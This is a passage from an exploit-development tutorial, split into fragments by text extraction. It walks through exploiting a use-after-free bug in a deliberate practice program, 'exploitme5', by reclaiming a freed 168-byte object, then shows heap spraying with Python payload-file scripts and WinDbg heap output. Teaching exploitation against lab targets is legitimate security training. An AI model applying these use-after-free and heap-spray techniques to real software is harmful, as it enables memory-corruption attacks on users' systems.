data
,
 
int
 
size
)
 
const
 
{
 
        
int
 
*
ptr
 
=
 
(
int
 
*)
data
;
 
        
for
 
(
int
 
i
 
=
 
0
;
 
i
 
<
 
size
 
/
 
4
;
 
++
i
)
 
            
ptr
[
i
]
 
*=
 
getParam
();
 
    
}
 
};
 
 
The size of 
Multiplier
 is:
 
bytes       reason
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 176 
-
 
--------------------------------
 
  4         VFTable ptr
 
  4         "param" property
 
40*4        "reserved" property
 
--------------------------------
 
 168 bytes
 
So if we allocate a block of 
168
 bytes
, the allocator will return to us the block which is still pointed to by 
mutators[0]
. How do we create such a block? We can use the option 
Read block from file
, but it might not 
work because
 fopen()
 is called before the new block is allocated. This may cau
se problems because 
fopen()
 
calls the allocator internally. Here’s the code for 
readBlock()
:
 
C++
 
 
void
 
readBlock
()
 
{
 
    
char
 
*
data
;
 
    
char
 
filePath
[
1024
];
 
 
while
 
(
true
)
 
{
 
        
printf
(
"File path ('exit' to exit): "
);
 
        
scanf_s
(
"%s"
,
 
filePat
h
,
 
sizeof
(
filePath
));
 
        
fflush
(
stdin
);
 
        
printf
(
"
\
n"
);
 
        
if
 
(!
strcmp
(
filePath
,
 
"exit"
))
 
            
return
;
 
        
FILE
 
*
f
 
=
 
fopen
(
filePath
,
 
"rb"
);
               
<======================
 
        
if
 
(!
f
)
 
            
printf
(
"Can't open the 
file!
\
n
\
n"
);
 
        
else
 
{
 
            
fseek
(
f
,
 
0L
,
 
SEEK_END
);
 
            
long
 
bytes
 
=
 
ftell
(
f
);
 
            
data
 
=
 
new
 
char
[
bytes
];
                    
<======================
 
 
fseek
(
f
,
 
0L
,
 
SEEK_SET
);
 
            
int
 
pos
 
=
 
0
;
 
            
whi
le
 
(
pos
 
<
 
bytes
)
 
{
 
                
int
 
len
 
=
 
bytes
 
-
 
pos
 
>
 
200
 
?
 
200
 
:
 
bytes
 
-
 
pos
;
 
                
fread
(
data
 
+
 
pos
,
 
1
,
 
len
,
 
f
);
 
                
pos
 
+=
 
len
;
 
            
}
 
            
fclose
(
f
);
 
 
blocks
.
push_back
(
Block
(
data
,
 
bytes
));
 
 
printf
(
"Block read (%d bytes)
\
n
\
n"
,
 
bytes
);
 
            
break
;
 
        
}
 
    
}
 
}
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 177 
-
 
 
For convenience, the code prints the addresses of the deallocated 
Multiplier
 (
mutators[0]
) and of the 
allocated blocks (in 
listBlocks()
).
 
Let’s try to exploit the UAF bu
g. First let’s create a file of 
168
 bytes with the following 
Python
 script:
 
Python
 
 
with
 
open
(
r'd:
\
obj.dat'
,
 
'wb'
)
 
as
 
f
:
 
  
f
.
write
(
'a'
*
168
)
 
 
Now let’s run 
exploitme5
:
 
1) Read block from file
 
2) List blocks
 
3) Duplicate Block
 
4) Configure mutator
 
5) Mutate 
block
 
6) Exit
 
 
Your choice [1
-
6]: 4
 
 
1) Multiplier (multiplier = 2)
 
2) LowerCaser
 
3) Exit
 
 
Your choice [1
-
3]: 1
 
 
mutators[0] = 0x004fc488          <======== deallocated block
 
multiplier (int): asdf
 
1) Read block from file
 
2) List blocks
 
3) Duplicate Block
 
4) Configure mutator
 
5) Mutate block
 
6) Exit
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 178 
-
 
 
Your choice [1
-
6]: 1
 
 
File path ('exit' to exit): d:
\
obj.dat
 
 
Block read (168 bytes)
 
 
1) Read block from file
 
2) List blocks
 
3) Duplicate Block
 
4) Configure mutator
 
5) Mutate block
 
6) Exit
 
 
Your choice [1
-
6]: 2
 
 
-------
 Blocks 
-------
 
block 0: address = 0x004fc488; size = 168    <======= allocated block
 
----------------------
 
 
1) Read block from file
 
2) List blocks
 
3) Duplicate Block
 
4) Configure mutator
 
5) Mutate block
 
6) Exit
 
 
Your choice [1
-
6]:
 
As you can see
, the new block was allocated at the same address of the deallocated mutator. This means 
that we control the contents of the memory pointed to by 
mutators[0]
.
 
This seems to be working, but a better way would be to
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 179 
-
 
1
.
 
Read block from file
 
2
.
 
Configure mutator
 ===
> UAF bug
 
3
.
 
Duplicate Block
 
This is more reliable because 
duplicateBlock()
 allocate a new block right away without calling other 
dangerous
 functions before:
 
C++
 
 
void
 
duplicateBlock
()
 
{
 
    
listBlocks
();
 
    
while
 
(
true
)
 
{
 
        
printf
(
"Index of block to d
uplicate (
-
1 to exit): "
);
 
        
int
 
index
;
 
        
scanf_s
(
"%d"
,
 
&
index
);
 
        
fflush
(
stdin
);
 
        
if
 
(
index
 
==
 
-
1
)
 
            
return
;
 
        
if
 
(
index
 
<
 
0
 
||
 
index
 
>=
 
(
int
)
blocks
.
size
())
 
{
 
            
printf
(
"Wrong index!
\
n"
);
 
        
}
 
       
else
 
{
 
            
while
 
(
true
)
 
{
 
                
int
 
copies
;
 
                
printf
(
"Number of copies (
-
1 to exit): "
);
 
                
scanf_s
(
"%d"
,
 
&
copies
);
 
                
fflush
(
stdin
);
 
                
if
 
(
copies
 
==
 
-
1
)
 
                    
return
;
 
 
if
 
(
copies
 
<=
 
0
)
 
                    
printf
(
"Wrong number of copies!
\
n"
);
 
                
else
 
{
 
                    
for
 
(
int
 
i
 
=
 
0
;
 
i
 
<
 
copies
;
 
++
i
)
 
{
 
                        
int
 
size
 
=
 
blocks
[
index
].
getSize
();
 
                        
void
 
*
data
 
=
 
new
 
char
[
size
];
       
<========================
 
                        
memcpy
(
data
,
 
blocks
[
index
].
getData
(),
 
size
);
 
                        
blocks
.
push_back
(
Block
(
data
,
 
size
));
 
                    
}
 
                    
return
;
 
                
}
 
  
}
 
        
}
 
    
}
 
}
 
 
Let’s try also this second method:
 
1) Read block from file
 
2) List blocks
 
3) Duplicate Block
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 180 
-
 
4) Configure mutator
 
5) Mutate block
 
6) Exit
 
 
Your choice [1
-
6]: 1
 
 
File path ('exit' to exit): d:
\
obj.dat
 
 
Block read (168 bytes)
 
 
1) Read block from file
 
2) List blocks
 
3) Duplicate Block
 
4) Configure mutator
 
5) Mutate block
 
6) Exit
 
 
Your choice [1
-
6]: 4
 
 
1) Multiplier (multiplier = 2)
 
2) LowerCaser
 
3) Exit
 
 
Your choice [1
-
3]: 1
 
 
mutators[0] = 0x0071c488            <=================
====
 
multiplier (int): asdf
 
1) Read block from file
 
2) List blocks
 
3) Duplicate Block
 
4) Configure mutator
 
5) Mutate block
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 181 
-
 
6) Exit
 
 
Your choice [1
-
6]: 3
 
 
-------
 Blocks 
-------
 
block 0: address = 0x0071c538; size = 168
 
----------------------
 
 
Index of bloc
k to duplicate (
-
1 to exit): 0
 
Number of copies (
-
1 to exit): 1
 
1) Read block from file
 
2) List blocks
 
3) Duplicate Block
 
4) Configure mutator
 
5) Mutate block
 
6) Exit
 
 
Your choice [1
-
6]: 2
 
 
-------
 Blocks 
-------
 
block 0: address = 0x0071c538; size = 168
 
b
lock 1: address = 0x0071c488; size = 168   <=====================
 
----------------------
 
 
1) Read block from file
 
2) List blocks
 
3) Duplicate Block
 
4) Configure mutator
 
5) Mutate block
 
6) Exit
 
 
Your choice [1
-
6]:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 182 
-
 
This works as well, of course.
 
Heap Sprayin
g in eploitme5
 
We can spray the heap by reading a big block from file and then making many copies of it. Let’s try to 
allocate blocks of 
1 MB
. We can create the file with this script:
 
Python
 
 
with
 
open
(
r'd:
\
buf.dat'
,
 
'wb'
)
 
as
 
f
:
 
    
f
.
write
(
'a'
*
0x100000
)
 
 
Note that 
0x100000
 is 
1 MB
 in hexadecimal. Let’s open 
exploitme5
 in WinDbg and run it:
 
1) Read block from file
 
2) List blocks
 
3) Duplicate Block
 
4) Configure mutator
 
5) Mutate block
 
6) Exit
 
 
Your choice [1
-
6]: 1
 
 
File path ('exit' to exit): d:
\
buf.dat
 
 
Blo
ck read (1048576 bytes)        <================ 1 MB
 
 
1) Read block from file
 
2) List blocks
 
3) Duplicate Block
 
4) Configure mutator
 
5) Mutate block
 
6) Exit
 
 
Your choice [1
-
6]: 3
 
 
-------
 Blocks 
-------
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 183 
-
 
block 0: address = 0x02070020; size = 1048576
 
------
----------------
 
 
Index of block to duplicate (
-
1 to exit): 0
 
Number of copies (
-
1 to exit): 200       <==================== 200 MB
 
1) Read block from file
 
2) List blocks
 
3) Duplicate Block
 
4) Configure mutator
 
5) Mutate block
 
6) Exit
 
 
Your choice [1
-
6]: 2
 
 
-------
 Blocks 
-------
 
block 0: address = 0x02070020; size = 1048576
 
block 1: address = 0x02270020; size = 1048576
 
block 2: address = 0x02380020; size = 1048576
 
block 3: address = 0x02490020; size = 1048576
 
block 4: address = 0x025a0020; size = 1048576
 
b
lock 5: address = 0x026b0020; size = 1048576
 
block 6: address = 0x027c0020; size = 1048576
 
block 7: address = 0x028d0020; size = 1048576
 
block 8: address = 0x029e0020; size = 1048576
 
block 9: address = 0x02af0020; size = 1048576
 
block 10: address = 0x02c00
020; size = 1048576
 
block 11: address = 0x02d10020; size = 1048576
 
block 12: address = 0x02e20020; size = 1048576
 
block 13: address = 0x02f30020; size = 1048576
 
block 14: address = 0x03040020; size = 1048576
 
block 15: address = 0x03150020; size = 1048576
 
b
lock 16: address = 0x03260020; size = 1048576
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 184 
-
 
block 17: address = 0x03370020; size = 1048576
 
block 18: address = 0x03480020; size = 1048576
 
block 19: address = 0x03590020; size = 1048576
 
block 20: address = 0x036a0020; size = 1048576
 
block 21: address = 0x
037b0020; size = 1048576
 
block 22: address = 0x038c0020; size = 1048576
 
block 23: address = 0x039d0020; size = 1048576
 
block 24: address = 0x03ae0020; size = 1048576
 
block 25: address = 0x03bf0020; size = 1048576
 
block 26: address = 0x03d00020; size = 1048
576
 
block 27: address = 0x03e10020; size = 1048576
 
block 28: address = 0x03f20020; size = 1048576
 
block 29: address = 0x04030020; size = 1048576
 
block 30: address = 0x04140020; size = 1048576
 
block 31: address = 0x04250020; size = 1048576
 
block 32: address
 = 0x04360020; size = 1048576
 
block 33: address = 0x04470020; size = 1048576
 
block 34: address = 0x04580020; size = 1048576
 
block 35: address = 0x04690020; size = 1048576
 
block 36: address = 0x047a0020; size = 1048576
 
block 37: address = 0x048b0020; size =
 1048576
 
block 38: address = 0x049c0020; size = 1048576
 
block 39: address = 0x04ad0020; size = 1048576
 
block 40: address = 0x04be0020; size = 1048576
 
block 41: address = 0x04cf0020; size = 1048576
 
block 42: address = 0x04e00020; size = 1048576
 
block 43: ad
dress = 0x04f10020; size = 1048576
 
block 44: address = 0x05020020; size = 1048576
 
block 45: address = 0x05130020; size = 1048576
 
block 46: address = 0x05240020; size = 1048576
 
block 47: address = 0x05350020; size = 1048576
 
block 48: address = 0x05460020; s
ize = 1048576
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 185 
-
 
block 49: address = 0x05570020; size = 1048576
 
block 50: address = 0x05680020; size = 1048576
 
block 51: address = 0x05790020; size = 1048576
 
block 52: address = 0x058a0020; size = 1048576
 
block 53: address = 0x059b0020; size = 1048576
 
block 5
4: address = 0x05ac0020; size = 1048576
 
block 55: address = 0x05bd0020; size = 1048576
 
block 56: address = 0x05ce0020; size = 1048576
 
block 57: address = 0x05df0020; size = 1048576
 
block 58: address = 0x05f00020; size = 1048576
 
block 59: address = 0x060100
20; size = 1048576
 
block 60: address = 0x06120020; size = 1048576
 
block 61: address = 0x06230020; size = 1048576
 
block 62: address = 0x06340020; size = 1048576
 
block 63: address = 0x06450020; size = 1048576
 
block 64: address = 0x06560020; size = 1048576
 
bl
ock 65: address = 0x06670020; size = 1048576
 
block 66: address = 0x06780020; size = 1048576
 
block 67: address = 0x06890020; size = 1048576
 
block 68: address = 0x069a0020; size = 1048576
 
block 69: address = 0x06ab0020; size = 1048576
 
block 70: address = 0x0
6bc0020; size = 1048576
 
block 71: address = 0x06cd0020; size = 1048576
 
block 72: address = 0x06de0020; size = 1048576
 
block 73: address = 0x06ef0020; size = 1048576
 
block 74: address = 0x07000020; size = 1048576
 
block 75: address = 0x07110020; size = 10485
76
 
block 76: address = 0x07220020; size = 1048576
 
block 77: address = 0x07330020; size = 1048576
 
block 78: address = 0x07440020; size = 1048576
 
block 79: address = 0x07550020; size = 1048576
 
block 80: address = 0x07660020; size = 1048576
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 186 
-
 
block 81: address 
= 0x07770020; size = 1048576
 
block 82: address = 0x07880020; size = 1048576
 
block 83: address = 0x07990020; size = 1048576
 
block 84: address = 0x07aa0020; size = 1048576
 
block 85: address = 0x07bb0020; size = 1048576
 
block 86: address = 0x07cc0020; size = 
1048576
 
block 87: address = 0x07dd0020; size = 1048576
 
block 88: address = 0x07ee0020; size = 1048576
 
block 89: address = 0x07ff0020; size = 1048576
 
block 90: address = 0x08100020; size = 1048576
 
block 91: address = 0x08210020; size = 1048576
 
block 92: add
ress = 0x08320020; size = 1048576
 
block 93: address = 0x08430020; size = 1048576
 
block 94: address = 0x08540020; size = 1048576
 
block 95: address = 0x08650020; size = 1048576
 
block 96: address = 0x08760020; size = 1048576
 
block 97: address = 0x08870020; si
ze = 1048576
 
block 98: address = 0x08980020; size = 1048576
 
block 99: address = 0x08a90020; size = 1048576
 
block 100: address = 0x08ba0020; size = 1048576
 
block 101: address = 0x08cb0020; size = 1048576
 
block 102: address = 0x08dc0020; size = 1048576
 
block
 103: address = 0x08ed0020; size = 1048576
 
block 104: address = 0x08fe0020; size = 1048576
 
block 105: address = 0x090f0020; size = 1048576
 
block 106: address = 0x09200020; size = 1048576
 
block 107: address = 0x09310020; size = 1048576
 
block 108: address = 
0x09420020; size = 1048576
 
block 109: address = 0x09530020; size = 1048576
 
block 110: address = 0x09640020; size = 1048576
 
block 111: address = 0x09750020; size = 1048576
 
block 112: address = 0x09860020; size = 1048576
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 187 
-
 
block 113: address = 0x09970020; size
 = 1048576
 
block 114: address = 0x09a80020; size = 1048576
 
block 115: address = 0x09b90020; size = 1048576
 
block 116: address = 0x09ca0020; size = 1048576
 
block 117: address = 0x09db0020; size = 1048576
 
block 118: address = 0x09ec0020; size = 1048576
 
block
 119: address = 0x09fd0020; size = 1048576
 
block 120: address = 0x0a0e0020; size = 1048576
 
block 121: address = 0x0a1f0020; size = 1048576
 
block 122: address = 0x0a300020; size = 1048576
 
block 123: address = 0x0a410020; size = 1048576
 
block 124: address = 
0x0a520020; size = 1048576
 
block 125: address = 0x0a630020; size = 1048576
 
block 126: address = 0x0a740020; size = 1048576
 
block 127: address = 0x0a850020; size = 1048576
 
block 128: address = 0x0a960020; size = 1048576
 
block 129: address = 0x0aa70020; size
 = 1048576
 
block 130: address = 0x0ab80020; size = 1048576
 
block 131: address = 0x0ac90020; size = 1048576
 
block 132: address = 0x0ada0020; size = 1048576
 
block 133: address = 0x0aeb0020; size = 1048576
 
block 134: address = 0x0afc0020; size = 1048576
 
block
 135: address = 0x0b0d0020; size = 1048576
 
block 136: address = 0x0b1e0020; size = 1048576
 
block 137: address = 0x0b2f0020; size = 1048576
 
block 138: address = 0x0b400020; size = 1048576
 
block 139: address = 0x0b510020; size = 1048576
 
block 140: address = 
0x0b620020; size = 1048576
 
block 141: address = 0x0b730020; size = 1048576
 
block 142: address = 0x0b840020; size = 1048576
 
block 143: address = 0x0b950020; size = 1048576
 
block 144: address = 0x0ba60020; size = 1048576
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 188 
-
 
block 145: address = 0x0bb70020; size
 = 1048576
 
block 146: address = 0x0bc80020; size = 1048576
 
block 147: address = 0x0bd90020; size = 1048576
 
block 148: address = 0x0bea0020; size = 1048576
 
block 149: address = 0x0bfb0020; size = 1048576
 
block 150: address = 0x0c0c0020; size = 1048576
 
block
 151: address = 0x0c1d0020; size = 1048576
 
block 152: address = 0x0c2e0020; size = 1048576
 
block 153: address = 0x0c3f0020; size = 1048576
 
block 154: address = 0x0c500020; size = 1048576
 
block 155: address = 0x0c610020; size = 1048576
 
block 156: address = 
0x0c720020; size = 1048576
 
block 157: address = 0x0c830020; size = 1048576
 
block 158: address = 0x0c940020; size = 1048576
 
block 159: address = 0x0ca50020; size = 1048576
 
block 160: address = 0x0cb60020; size = 1048576
 
block 161: address = 0x0cc70020; size
 = 1048576
 
block 162: address = 0x0cd80020; size = 1048576
 
block 163: address = 0x0ce90020; size = 1048576
 
block 164: address = 0x0cfa0020; size = 1048576
 
block 165: address = 0x0d0b0020; size = 1048576
 
block 166: address = 0x0d1c0020; size = 1048576
 
block
 167: address = 0x0d2d0020; size = 1048576
 
block 168: address = 0x0d3e0020; size = 1048576
 
block 169: address = 0x0d4f0020; size = 1048576
 
block 170: address = 0x0d600020; size = 1048576
 
block 171: address = 0x0d710020; size = 1048576
 
block 172: address = 
0x0d820020; size = 1048576
 
block 173: address = 0x0d930020; size = 1048576
 
block 174: address = 0x0da40020; size = 1048576
 
block 175: address = 0x0db50020; size = 1048576
 
block 176: address = 0x0dc60020; size = 1048576
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 189 
-
 
block 177: address = 0x0dd70020; size
 = 1048576
 
block 178: address = 0x0de80020; size = 1048576
 
block 179: address = 0x0df90020; size = 1048576
 
block 180: address = 0x0e0a0020; size = 1048576
 
block 181: address = 0x0e1b0020; size = 1048576
 
block 182: address = 0x0e2c0020; size = 1048576
 
block
 183: address = 0x0e3d0020; size = 1048576
 
block 184: address = 0x0e4e0020; size = 1048576
 
block 185: address = 0x0e5f0020; size = 1048576
 
block 186: address = 0x0e700020; size = 1048576
 
block 187: address = 0x0e810020; size = 1048576
 
block 188: address = 
0x0e920020; size = 1048576
 
block 189: address = 0x0ea30020; size = 1048576
 
block 190: address = 0x0eb40020; size = 1048576
 
block 191: address = 0x0ec50020; size = 1048576
 
block 192: address = 0x0ed60020; size = 1048576
 
block 193: address = 0x0ee70020; size
 = 1048576
 
block 194: address = 0x0ef80020; size = 1048576
 
block 195: address = 0x0f090020; size = 1048576
 
block 196: address = 0x0f1a0020; size = 1048576
 
block 197: address = 0x0f2b0020; size = 1048576
 
block 198: address = 0x0f3c0020; size = 1048576
 
block
 199: address = 0x0f4d0020; size = 1048576
 
block 200: address = 0x0f5e0020; size = 1048576
 
----------------------
 
 
1) Read block from file
 
2) List blocks
 
3) Duplicate Block
 
4) Configure mutator
 
5) Mutate block
 
6) Exit
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 190 
-
 
 
Your choice [1
-
6]:
 
Now click on 
Debug
→
Break
 in WinDbg and inspect the heap:
 
0:001> !heap
 
NtGlobalFlag enables following debugging aids for new heaps:    tail checking
 
    free checking
 
    validate parameters
 
Index   Address  Name      Debugging options enabled
 
  1:   00140000                
 tail checking free checking validate parameters
 
  2:   00650000                 tail checking free checking validate parameters
 
  3:   01c80000                 tail checking free checking validate parameters
 
  4:   01e10000                 tail checking f
ree checking validate parameters
 
0:001> !heap 
-
m           <=========== 
-
m displays the segments
 
Index   Address  Name      Debugging options enabled
 
  1:   00140000
 
    Segment at 00140000 to 00240000 (0002f000 bytes committed)
 
  2:   00650000
 
    Segment
 at 00650000 to 00660000 (00003000 bytes committed)
 
  3:   01c80000
 
    Segment at 01c80000 to 01c90000 (0000c000 bytes committed)
 
    Segment at 01e50000 to 01f50000 (0001c000 bytes committed)
 
  4:   01e10000
 
    Segment at 01e10000 to 01e50000 (00001000 
bytes committed)
 
That’s odd... where are our 
200 MB
 of data? The problem is that when the Heap manager is asked to 
allocate a block whose size is above a certain threshold, the allocation request is sent directly to the 
Virtual 
Memory Manager
. Let’s have a l
ook:
 
0:001> !heap 
-
s                   ("
-
s" stands for "summary")
 
NtGlobalFlag enables following debugging aids for new heaps:
 
    tail checking
 
    free checking
 
    validate parameters
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 191 
-
 
LFH Key                   : 0x66cab5dc
 
Termination on corruption : E
NABLED
 
  Heap     Flags   Reserv  Commit  Virt   Free  List   UCR  Virt  Lock  Fast
 
                    (k)     (k)    (k)     (k) length      blocks cont. heap
 
-----------------------------------------------------------------------------
 
Virtual block: 02
070000 
-
 02070000 (size 00000000)
 
Virtual block: 02270000 
-
 02270000 (size 00000000)
 
Virtual block: 02380000 
-
 02380000 (size 00000000)
 
Virtual block: 02490000 
-
 02490000 (size 00000000)
 
Virtual block: 025a0000 
-
 025a0000 (size 00000000)
 
Virtual block: 026
b0000 
-
 026b0000 (size 00000000)
 
Virtual block: 027c0000 
-
 027c0000 (size 00000000)
 
Virtual block: 028d0000 
-
 028d0000 (size 00000000)
 
Virtual block: 029e0000 
-
 029e0000 (size 00000000)
 
Virtual block: 02af0000 
-
 02af0000 (size 00000000)
 
Virtual block: 02c0
0000 
-
 02c00000 (size 00000000)
 
Virtual block: 02d10000 
-
 02d10000 (size 00000000)
 
Virtual block: 02e20000 
-
 02e20000 (size 00000000)
 
Virtual block: 02f30000 
-
 02f30000 (size 00000000)
 
Virtual block: 03040000 
-
 03040000 (size 00000000)
 
Virtual block: 03150
000 
-
 03150000 (size 00000000)
 
Virtual block: 03260000 
-
 03260000 (size 00000000)
 
Virtual block: 03370000 
-
 03370000 (size 00000000)
 
Virtual block: 03480000 
-
 03480000 (size 00000000)
 
Virtual block: 03590000 
-
 03590000 (size 00000000)
 
Virtual block: 036a00
00 
-
 036a0000 (size 00000000)
 
Virtual block: 037b0000 
-
 037b0000 (size 00000000)
 
Virtual block: 038c0000 
-
 038c0000 (size 00000000)
 
Virtual block: 039d0000 
-
 039d0000 (size 00000000)
 
Virtual block: 03ae0000 
-
 03ae0000 (size 00000000)
 
Virtual block: 03bf000
0 
-
 03bf0000 (size 00000000)
 
Virtual block: 03d00000 
-
 03d00000 (size 00000000)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 192 
-
 
Virtual block: 03e10000 
-
 03e10000 (size 00000000)
 
Virtual block: 03f20000 
-
 03f20000 (size 00000000)
 
Virtual block: 04030000 
-
 04030000 (size 00000000)
 
Virtual block: 04140000
 
-
 04140000 (size 00000000)
 
Virtual block: 04250000 
-
 04250000 (size 00000000)
 
Virtual block: 04360000 
-
 04360000 (size 00000000)
 
Virtual block: 04470000 
-
 04470000 (size 00000000)
 
Virtual block: 04580000 
-
 04580000 (size 00000000)
 
Virtual block: 04690000 
-
 04690000 (size 00000000)
 
Virtual block: 047a0000 
-
 047a0000 (size 00000000)
 
Virtual block: 048b0000 
-
 048b0000 (size 00000000)
 
Virtual block: 049c0000 
-
 049c0000 (size 00000000)
 
Virtual block: 04ad0000 
-
 04ad0000 (size 00000000)
 
Virtual block: 04be0000 
-
 04be0000 (size 00000000)
 
Virtual block: 04cf0000 
-
 04cf0000 (size 00000000)
 
Virtual block: 04e00000 
-
 04e00000 (size 00000000)
 
Virtual block: 04f10000 
-
 04f10000 (size 00000000)
 
Virtual block: 05020000 
-
 05020000 (size 00000000)
 
Virtual block: 05130000 
-
 
05130000 (size 00000000)
 
Virtual block: 05240000 
-
 05240000 (size 00000000)
 
Virtual block: 05350000 
-
 05350000 (size 00000000)
 
Virtual block: 05460000 
-
 05460000 (size 00000000)
 
Virtual block: 05570000 
-
 05570000 (size 00000000)
 
Virtual block: 05680000 
-
 0
5680000 (size 00000000)
 
Virtual block: 05790000 
-
 05790000 (size 00000000)
 
Virtual block: 058a0000 
-
 058a0000 (size 00000000)
 
Virtual block: 059b0000 
-
 059b0000 (size 00000000)
 
Virtual block: 05ac0000 
-
 05ac0000 (size 00000000)
 
Virtual block: 05bd0000 
-
 05
bd0000 (size 00000000)
 
Virtual block: 05ce0000 
-
 05ce0000 (size 00000000)
 
Virtual block: 05df0000 
-
 05df0000 (size 00000000)
 
Virtual block: 05f00000 
-
 05f00000 (size 00000000)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 193 
-
 
Virtual block: 06010000 
-
 06010000 (size 00000000)
 
Virtual block: 06120000 
-
 061
20000 (size 00000000)
 
Virtual block: 06230000 
-
 06230000 (size 00000000)
 
Virtual block: 06340000 
-
 06340000 (size 00000000)
 
Virtual block: 06450000 
-
 06450000 (size 00000000)
 
Virtual block: 06560000 
-
 06560000 (size 00000000)
 
Virtual block: 06670000 
-
 0667
0000 (size 00000000)
 
Virtual block: 06780000 
-
 06780000 (size 00000000)
 
Virtual block: 06890000 
-
 06890000 (size 00000000)
 
Virtual block: 069a0000 
-
 069a0000 (size 00000000)
 
Virtual block: 06ab0000 
-
 06ab0000 (size 00000000)
 
Virtual block: 06bc0000 
-
 06bc0
000 (size 00000000)
 
Virtual block: 06cd0000 
-
 06cd0000 (size 00000000)
 
Virtual block: 06de0000 
-
 06de0000 (size 00000000)
 
Virtual block: 06ef0000 
-
 06ef0000 (size 00000000)
 
Virtual block: 07000000 
-
 07000000 (size 00000000)
 
Virtual block: 07110000 
-
 071100
00 (size 00000000)
 
Virtual block: 07220000 
-
 07220000 (size 00000000)
 
Virtual block: 07330000 
-
 07330000 (size 00000000)
 
Virtual block: 07440000 
-
 07440000 (size 00000000)
 
Virtual block: 07550000 
-
 07550000 (size 00000000)
 
Virtual block: 07660000 
-
 0766000
0 (size 00000000)
 
Virtual block: 07770000 
-
 07770000 (size 00000000)
 
Virtual block: 07880000 
-
 07880000 (size 00000000)
 
Virtual block: 07990000 
-
 07990000 (size 00000000)
 
Virtual block: 07aa0000 
-
 07aa0000 (size 00000000)
 
Virtual block: 07bb0000 
-
 07bb0000
 (size 00000000)
 
Virtual block: 07cc0000 
-
 07cc0000 (size 00000000)
 
Virtual block: 07dd0000 
-
 07dd0000 (size 00000000)
 
Virtual block: 07ee0000 
-
 07ee0000 (size 00000000)
 
Virtual block: 07ff0000 
-
 07ff0000 (size 00000000)
 
Virtual block: 08100000 
-
 08100000 
(size 00000000)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 1
94 
-
 
Virtual block: 08210000 
-
 08210000 (size 00000000)
 
Virtual block: 08320000 
-
 08320000 (size 00000000)
 
Virtual block: 08430000 
-
 08430000 (size 00000000)
 
Virtual block: 08540000 
-
 08540000 (size 00000000)
 
Virtual block: 08650000 
-
 08650000 (
size 00000000)
 
Virtual block: 08760000 
-
 08760000 (size 00000000)
 
Virtual block: 08870000 
-
 08870000 (size 00000000)
 
Virtual block: 08980000 
-
 08980000 (size 00000000)
 
Virtual block: 08a90000 
-
 08a90000 (size 00000000)
 
Virtual block: 08ba0000 
-
 08ba0000 (s
ize 00000000)
 
Virtual block: 08cb0000 
-
 08cb0000 (size 00000000)
 
Virtual block: 08dc0000 
-
 08dc0000 (size 00000000)
 
Virtual block: 08ed0000 
-
 08ed0000 (size 00000000)
 
Virtual block: 08fe0000 
-
 08fe0000 (size 00000000)
 
Virtual block: 090f0000 
-
 090f0000 (si
ze 00000000)
 
Virtual block: 09200000 
-
 09200000 (size 00000000)
 
Virtual block: 09310000 
-
 09310000 (size 00000000)
 
Virtual block: 09420000 
-
 09420000 (size 00000000)
 
Virtual block: 09530000 
-
 09530000 (size 00000000)
 
Virtual block: 09640000 
-
 09640000 (siz
e 00000000)
 
Virtual block: 09750000 
-
 09750000 (size 00000000)
 
Virtual block: 09860000 
-
 09860000 (size 00000000)
 
Virtual block: 09970000 
-
 09970000 (size 00000000)
 
Virtual block: 09a80000 
-
 09a80000 (size 00000000)
 
Virtual block: 09b90000 
-
 09b90000 (size
 00000000)
 
Virtual block: 09ca0000 
-
 09ca0000 (size 00000000)
 
Virtual block: 09db0000 
-
 09db0000 (size 00000000)
 
Virtual block: 09ec0000 
-
 09ec0000 (size 00000000)
 
Virtual block: 09fd0000 
-
 09fd0000 (size 00000000)
 
Virtual block: 0a0e0000 
-
 0a0e0000 (size 
00000000)
 
Virtual block: 0a1f0000 
-
 0a1f0000 (size 00000000)
 
Virtual block: 0a300000 
-
 0a300000 (size 00000000)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 195 
-
 
Virtual block: 0a410000 
-
 0a410000 (size 00000000)
 
Virtual block: 0a520000 
-
 0a520000 (size 00000000)
 
Virtual block: 0a630000 
-
 0a630000 (size 0
0000000)
 
Virtual block: 0a740000 
-
 0a740000 (size 00000000)
 
Virtual block: 0a850000 
-
 0a850000 (size 00000000)
 
Virtual block: 0a960000 
-
 0a960000 (size 00000000)
 
Virtual block: 0aa70000 
-
 0aa70000 (size 00000000)
 
Virtual block: 0ab80000 
-
 0ab80000 (size 00
000000)
 
Virtual block: 0ac90000 
-
 0ac90000 (size 00000000)
 
Virtual block: 0ada0000 
-
 0ada0000 (size 00000000)
 
Virtual block: 0aeb0000 
-
